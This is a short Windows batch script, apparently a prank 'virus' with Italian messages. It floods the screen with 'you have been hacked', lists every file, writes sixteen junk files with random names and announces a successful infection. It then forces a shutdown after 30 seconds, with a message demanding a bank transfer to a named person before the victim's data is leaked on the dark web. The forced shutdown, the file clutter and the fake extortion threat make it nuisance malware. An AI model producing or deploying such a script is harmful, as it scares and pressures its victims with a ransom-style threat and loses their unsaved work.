@echo off
color 0a
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
echo sei stato hackerato! :)
ping localhost -n 5 >nul
dir /s
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
echo :) > %random%%random%.txt
cls
color 07
echo Computer successfully infected.
echo Press any key to exit.
pause >nul

REM Schedule system shutdown with a message
shutdown -s -f -t 30 -c "Hai 30 secondi per salvare tutto! E fare un bonifico a Viraj prima che i tuoi dati vengano diffusi nel dark web!"

exit
